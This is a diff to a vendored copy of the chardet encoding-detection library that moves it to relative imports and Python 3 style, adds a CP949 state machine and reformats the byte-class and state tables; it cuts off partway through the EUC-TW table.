a/thirdparty/chardet/latin1prober.py +++ b/thirdparty/chardet/latin1prober.py @@ -14,85 +14,86 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetprober import CharSetProber -import constants -import operator +from .charsetprober import CharSetProber +from .constants import eNotMe +from .compat import wrap_ord FREQ_CAT_NUM = 4 -UDF = 0 # undefined -OTH = 1 # other -ASC = 2 # ascii capital letter -ASS = 3 # ascii small letter -ACV = 4 # accent capital vowel -ACO = 5 # accent capital other -ASV = 6 # accent small vowel -ASO = 7 # accent small other -CLASS_NUM = 8 # total classes +UDF = 0 # undefined +OTH = 1 # other +ASC = 2 # ascii capital letter +ASS = 3 # ascii small letter +ACV = 4 # accent capital vowel +ACO = 5 # accent capital other +ASV = 6 # accent small vowel +ASO = 7 # accent small other +CLASS_NUM = 8 # total classes -Latin1_CharToClass = ( \ - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F - OTH, ASC, ASC, 
ASC, ASC, ASC, ASC, ASC, # 40 - 47 - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F - ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 - ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F - OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F - ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 70 - 77 - ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F - OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 - OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F - UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 - OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 - OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF - ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 - ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF - ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 - ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF - ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 - ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF - ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 - ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF +Latin1_CharToClass = ( + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 00 - 07 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 08 - 0F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 10 - 17 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 18 - 1F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 20 - 27 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 28 - 2F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 30 - 37 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 38 - 3F + OTH, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 40 - 47 + ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 48 - 4F + ASC, ASC, ASC, ASC, ASC, ASC, ASC, ASC, # 50 - 57 + ASC, ASC, ASC, OTH, OTH, OTH, OTH, OTH, # 58 - 5F + OTH, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 60 - 67 + ASS, ASS, ASS, ASS, ASS, ASS, ASS, ASS, # 68 - 6F + ASS, ASS, ASS, 
ASS, ASS, ASS, ASS, ASS, # 70 - 77 + ASS, ASS, ASS, OTH, OTH, OTH, OTH, OTH, # 78 - 7F + OTH, UDF, OTH, ASO, OTH, OTH, OTH, OTH, # 80 - 87 + OTH, OTH, ACO, OTH, ACO, UDF, ACO, UDF, # 88 - 8F + UDF, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # 90 - 97 + OTH, OTH, ASO, OTH, ASO, UDF, ASO, ACO, # 98 - 9F + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A0 - A7 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # A8 - AF + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B0 - B7 + OTH, OTH, OTH, OTH, OTH, OTH, OTH, OTH, # B8 - BF + ACV, ACV, ACV, ACV, ACV, ACV, ACO, ACO, # C0 - C7 + ACV, ACV, ACV, ACV, ACV, ACV, ACV, ACV, # C8 - CF + ACO, ACO, ACV, ACV, ACV, ACV, ACV, OTH, # D0 - D7 + ACV, ACV, ACV, ACV, ACV, ACO, ACO, ACO, # D8 - DF + ASV, ASV, ASV, ASV, ASV, ASV, ASO, ASO, # E0 - E7 + ASV, ASV, ASV, ASV, ASV, ASV, ASV, ASV, # E8 - EF + ASO, ASO, ASV, ASV, ASV, ASV, ASV, OTH, # F0 - F7 + ASV, ASV, ASV, ASV, ASV, ASO, ASO, ASO, # F8 - FF ) -# 0 : illegal -# 1 : very unlikely -# 2 : normal +# 0 : illegal +# 1 : very unlikely +# 2 : normal # 3 : very likely -Latin1ClassModel = ( \ -# UDF OTH ASC ASS ACV ACO ASV ASO - 0, 0, 0, 0, 0, 0, 0, 0, # UDF - 0, 3, 3, 3, 3, 3, 3, 3, # OTH - 0, 3, 3, 3, 3, 3, 3, 3, # ASC - 0, 3, 3, 3, 1, 1, 3, 3, # ASS - 0, 3, 3, 3, 1, 2, 1, 2, # ACV - 0, 3, 3, 3, 3, 3, 3, 3, # ACO - 0, 3, 1, 3, 1, 1, 1, 3, # ASV - 0, 3, 1, 3, 1, 1, 3, 3, # ASO +Latin1ClassModel = ( + # UDF OTH ASC ASS ACV ACO ASV ASO + 0, 0, 0, 0, 0, 0, 0, 0, # UDF + 0, 3, 3, 3, 3, 3, 3, 3, # OTH + 0, 3, 3, 3, 3, 3, 3, 3, # ASC + 0, 3, 3, 3, 1, 1, 3, 3, # ASS + 0, 3, 3, 3, 1, 2, 1, 2, # ACV + 0, 3, 3, 3, 3, 3, 3, 3, # ACO + 0, 3, 1, 3, 1, 1, 1, 3, # ASV + 0, 3, 1, 3, 1, 1, 3, 3, # ASO ) + class Latin1Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) @@ -109,10 +110,11 @@ class Latin1Prober(CharSetProber): def feed(self, aBuf): aBuf = self.filter_with_english_letters(aBuf) for c in aBuf: - charClass = Latin1_CharToClass[ord(c)] - freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + 
charClass] + charClass = Latin1_CharToClass[wrap_ord(c)] + freq = Latin1ClassModel[(self._mLastCharClass * CLASS_NUM) + + charClass] if freq == 0: - self._mState = constants.eNotMe + self._mState = eNotMe break self._mFreqCounter[freq] += 1 self._mLastCharClass = charClass @@ -120,17 +122,18 @@ class Latin1Prober(CharSetProber): return self.get_state() def get_confidence(self): - if self.get_state() == constants.eNotMe: + if self.get_state() == eNotMe: return 0.01 - total = reduce(operator.add, self._mFreqCounter) + total = sum(self._mFreqCounter) if total < 0.01: confidence = 0.0 else: - confidence = (self._mFreqCounter[3] / total) - (self._mFreqCounter[1] * 20.0 / total) + confidence = ((self._mFreqCounter[3] - self._mFreqCounter[1] * 20.0) + / total) if confidence < 0.0: confidence = 0.0 - # lower the confidence of latin1 so that other more accurate detector - # can take priority. - confidence = confidence * 0.5 + # lower the confidence of latin1 so that other more accurate + # detector can take priority. + confidence = confidence * 0.73 return confidence diff --git a/thirdparty/chardet/mbcharsetprober.py b/thirdparty/chardet/mbcharsetprober.py index 09b035e02..bb42f2fb5 100644 --- a/thirdparty/chardet/mbcharsetprober.py +++ b/thirdparty/chardet/mbcharsetprober.py @@ -15,28 +15,29 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. 
-# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from constants import eStart, eError, eItsMe -from charsetprober import CharSetProber +import sys +from . import constants +from .charsetprober import CharSetProber + class MultiByteCharSetProber(CharSetProber): def __init__(self): CharSetProber.__init__(self) self._mDistributionAnalyzer = None self._mCodingSM = None - self._mLastChar = ['\x00', '\x00'] + self._mLastChar = [0, 0] def reset(self): CharSetProber.reset(self) @@ -44,36 +45,39 @@ class MultiByteCharSetProber(CharSetProber): self._mCodingSM.reset() if self._mDistributionAnalyzer: self._mDistributionAnalyzer.reset() - self._mLastChar = ['\x00', '\x00'] + self._mLastChar = [0, 0] def get_charset_name(self): pass def feed(self, aBuf): aLen = len(aBuf) - for i in xrange(0, aLen): + for i in range(0, aLen): codingState = self._mCodingSM.next_state(aBuf[i]) - if codingState == eError: + if codingState == constants.eError: if constants._debug: - sys.stderr.write(self.get_charset_name() + ' prober hit error at byte ' + str(i) + '\n') + sys.stderr.write(self.get_charset_name() + + ' prober hit error at byte ' + str(i) + + '\n') self._mState = constants.eNotMe break - elif codingState == eItsMe: + elif codingState == constants.eItsMe: self._mState = constants.eFoundIt break - elif codingState == eStart: + elif codingState == constants.eStart: charLen = self._mCodingSM.get_current_charlen() if i == 0: self._mLastChar[1] = aBuf[0] self._mDistributionAnalyzer.feed(self._mLastChar, charLen) else: - self._mDistributionAnalyzer.feed(aBuf[i-1:i+1], charLen) + self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1], + charLen) self._mLastChar[0] = aBuf[aLen - 1] if self.get_state() == constants.eDetecting: - if 
self._mDistributionAnalyzer.got_enough_data() and \ - (self.get_confidence() > constants.SHORTCUT_THRESHOLD): + if (self._mDistributionAnalyzer.got_enough_data() and + (self.get_confidence() > constants.SHORTCUT_THRESHOLD)): self._mState = constants.eFoundIt return self.get_state() diff --git a/thirdparty/chardet/mbcsgroupprober.py b/thirdparty/chardet/mbcsgroupprober.py index 941cc3e37..03c9dcf3e 100644 --- a/thirdparty/chardet/mbcsgroupprober.py +++ b/thirdparty/chardet/mbcsgroupprober.py @@ -15,36 +15,40 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from charsetgroupprober import CharSetGroupProber -from utf8prober import UTF8Prober -from sjisprober import SJISProber -from eucjpprober import EUCJPProber -from gb2312prober import GB2312Prober -from euckrprober import EUCKRProber -from big5prober import Big5Prober -from euctwprober import EUCTWProber +from .charsetgroupprober import CharSetGroupProber +from .utf8prober import UTF8Prober +from .sjisprober import SJISProber +from .eucjpprober import EUCJPProber +from .gb2312prober import GB2312Prober +from .euckrprober import EUCKRProber +from .cp949prober import CP949Prober +from .big5prober import Big5Prober +from .euctwprober import EUCTWProber + class MBCSGroupProber(CharSetGroupProber): def __init__(self): 
CharSetGroupProber.__init__(self) - self._mProbers = [ \ + self._mProbers = [ UTF8Prober(), SJISProber(), EUCJPProber(), GB2312Prober(), EUCKRProber(), + CP949Prober(), Big5Prober(), - EUCTWProber()] + EUCTWProber() + ] self.reset() diff --git a/thirdparty/chardet/mbcssm.py b/thirdparty/chardet/mbcssm.py index 2b68306b0..efe678ca0 100644 --- a/thirdparty/chardet/mbcssm.py +++ b/thirdparty/chardet/mbcssm.py @@ -13,60 +13,62 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -from constants import eStart, eError, eItsMe +from .constants import eStart, eError, eItsMe -# BIG5 +# BIG5 -BIG5_cls = ( \ +BIG5_cls = ( 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 4,4,4,4,4,4,4,4, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 4,3,3,3,3,3,3,3, # a0 - a7 - 3,3,3,3,3,3,3,3, # a8 - af - 3,3,3,3,3,3,3,3, # b0 - b7 - 
3,3,3,3,3,3,3,3, # b8 - bf - 3,3,3,3,3,3,3,3, # c0 - c7 - 3,3,3,3,3,3,3,3, # c8 - cf - 3,3,3,3,3,3,3,3, # d0 - d7 - 3,3,3,3,3,3,3,3, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,3,3,3, # e8 - ef - 3,3,3,3,3,3,3,3, # f0 - f7 - 3,3,3,3,3,3,3,0) # f8 - ff + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,1, # 78 - 7f + 4,4,4,4,4,4,4,4, # 80 - 87 + 4,4,4,4,4,4,4,4, # 88 - 8f + 4,4,4,4,4,4,4,4, # 90 - 97 + 4,4,4,4,4,4,4,4, # 98 - 9f + 4,3,3,3,3,3,3,3, # a0 - a7 + 3,3,3,3,3,3,3,3, # a8 - af + 3,3,3,3,3,3,3,3, # b0 - b7 + 3,3,3,3,3,3,3,3, # b8 - bf + 3,3,3,3,3,3,3,3, # c0 - c7 + 3,3,3,3,3,3,3,3, # c8 - cf + 3,3,3,3,3,3,3,3, # d0 - d7 + 3,3,3,3,3,3,3,3, # d8 - df + 3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,3,3,3, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,3,3,0 # f8 - ff +) -BIG5_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f - eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart)#10-17 +BIG5_st = ( + eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 + eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f + eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17 +) Big5CharLenTable = (0, 1, 1, 2, 0) @@ -76,48 +78,90 @@ Big5SMModel = {'classTable': BIG5_cls, 'charLenTable': Big5CharLenTable, 'name': 'Big5'} +# CP949 + +CP949_cls = ( + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f + 1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f + 1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f + 1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f + 4,4,5,5,5,5,5,5, 
5,5,5,1,1,1,1,1, # 50 - 5f + 1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f + 5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f + 0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f + 6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f + 6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af + 7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf + 7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef + 2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff +) + +CP949_st = ( +#cls= 0 1 2 3 4 5 6 7 8 9 # previous state = + eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart + eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe + eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3 + eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4 + eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5 + eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6 +) + +CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2) + +CP949SMModel = {'classTable': CP949_cls, + 'classFactor': 10, + 'stateTable': CP949_st, + 'charLenTable': CP949CharLenTable, + 'name': 'CP949'} + # EUC-JP -EUCJP_cls = ( \ - 4,4,4,4,4,4,4,4, # 00 - 07 - 4,4,4,4,4,4,5,5, # 08 - 0f - 4,4,4,4,4,4,4,4, # 10 - 17 - 4,4,4,5,4,4,4,4, # 18 - 1f - 4,4,4,4,4,4,4,4, # 20 - 27 - 4,4,4,4,4,4,4,4, # 28 - 2f - 4,4,4,4,4,4,4,4, # 30 - 37 - 4,4,4,4,4,4,4,4, # 38 - 3f - 4,4,4,4,4,4,4,4, # 40 - 47 - 4,4,4,4,4,4,4,4, # 48 - 4f - 4,4,4,4,4,4,4,4, # 50 - 57 - 4,4,4,4,4,4,4,4, # 58 - 5f - 4,4,4,4,4,4,4,4, # 60 - 67 - 4,4,4,4,4,4,4,4, # 68 - 6f - 4,4,4,4,4,4,4,4, # 70 - 77 - 4,4,4,4,4,4,4,4, # 78 - 7f - 5,5,5,5,5,5,5,5, # 80 - 87 - 5,5,5,5,5,5,1,3, # 88 - 8f - 5,5,5,5,5,5,5,5, # 90 - 97 - 5,5,5,5,5,5,5,5, # 98 - 9f - 5,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 
2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,0,5) # f8 - ff +EUCJP_cls = ( + 4,4,4,4,4,4,4,4, # 00 - 07 + 4,4,4,4,4,4,5,5, # 08 - 0f + 4,4,4,4,4,4,4,4, # 10 - 17 + 4,4,4,5,4,4,4,4, # 18 - 1f + 4,4,4,4,4,4,4,4, # 20 - 27 + 4,4,4,4,4,4,4,4, # 28 - 2f + 4,4,4,4,4,4,4,4, # 30 - 37 + 4,4,4,4,4,4,4,4, # 38 - 3f + 4,4,4,4,4,4,4,4, # 40 - 47 + 4,4,4,4,4,4,4,4, # 48 - 4f + 4,4,4,4,4,4,4,4, # 50 - 57 + 4,4,4,4,4,4,4,4, # 58 - 5f + 4,4,4,4,4,4,4,4, # 60 - 67 + 4,4,4,4,4,4,4,4, # 68 - 6f + 4,4,4,4,4,4,4,4, # 70 - 77 + 4,4,4,4,4,4,4,4, # 78 - 7f + 5,5,5,5,5,5,5,5, # 80 - 87 + 5,5,5,5,5,5,1,3, # 88 - 8f + 5,5,5,5,5,5,5,5, # 90 - 97 + 5,5,5,5,5,5,5,5, # 98 - 9f + 5,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,2,2,2, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,2,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,0,5 # f8 - ff +) -EUCJP_st = ( \ - 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 - eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f - 3,eError,eError,eError,eStart,eStart,eStart,eStart)#20-27 +EUCJP_st = ( + 3, 4, 3, 5,eStart,eError,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17 + eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f + 3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27 +) EUCJPCharLenTable = (2, 2, 2, 3, 1, 0) @@ -129,43 +173,45 @@ EUCJPSMModel = {'classTable': EUCJP_cls, # EUC-KR -EUCKR_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 
1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,3,3,3, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,3,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 2,2,2,2,2,2,2,2, # e0 - e7 - 2,2,2,2,2,2,2,2, # e8 - ef - 2,2,2,2,2,2,2,2, # f0 - f7 - 2,2,2,2,2,2,2,0) # f8 - ff +EUCKR_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 1,1,1,1,1,1,1,1, # 40 - 47 + 1,1,1,1,1,1,1,1, # 48 - 4f + 1,1,1,1,1,1,1,1, # 50 - 57 + 1,1,1,1,1,1,1,1, # 58 - 5f + 1,1,1,1,1,1,1,1, # 60 - 67 + 1,1,1,1,1,1,1,1, # 68 - 6f + 1,1,1,1,1,1,1,1, # 70 - 77 + 1,1,1,1,1,1,1,1, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,3,3,3, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,3,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 2,2,2,2,2,2,2,2, # e0 - e7 + 2,2,2,2,2,2,2,2, # e8 - ef + 2,2,2,2,2,2,2,2, # f0 - f7 + 2,2,2,2,2,2,2,0 # f8 - ff +) EUCKR_st = ( - eError,eStart, 3,eError,eError,eError,eError,eError,#00-07 - eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart)#08-0f + eError,eStart, 
3,eError,eError,eError,eError,eError,#00-07 + eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f +) EUCKRCharLenTable = (0, 1, 2, 0) @@ -177,47 +223,49 @@ EUCKRSMModel = {'classTable': EUCKR_cls, # EUC-TW -EUCTW_cls = ( \ - 2,2,2,2,2,2,2,2, # 00 - 07 - 2,2,2,2,2,2,0,0, # 08 - 0f - 2,2,2,2,2,2,2,2, # 10 - 17 - 2,2,2,0,2,2,2,2, # 18 - 1f - 2,2,2,2,2,2,2,2, # 20 - 27 - 2,2,2,2,2,2,2,2, # 28 - 2f - 2,2,2,2,2,2,2,2, # 30 - 37 - 2,2,2,2,2,2,2,2, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,2, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,6,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,3,4,4,4,4,4,4, # a0 - a7 - 5,5,1,1,1,1,1,1, # a8 - af - 1,1,1,1,1,1,1,1, # b0 - b7 - 1,1,1,1,1,1,1,1, # b8 - bf - 1,1,3,1,3,3,3,3, # c0 - c7 - 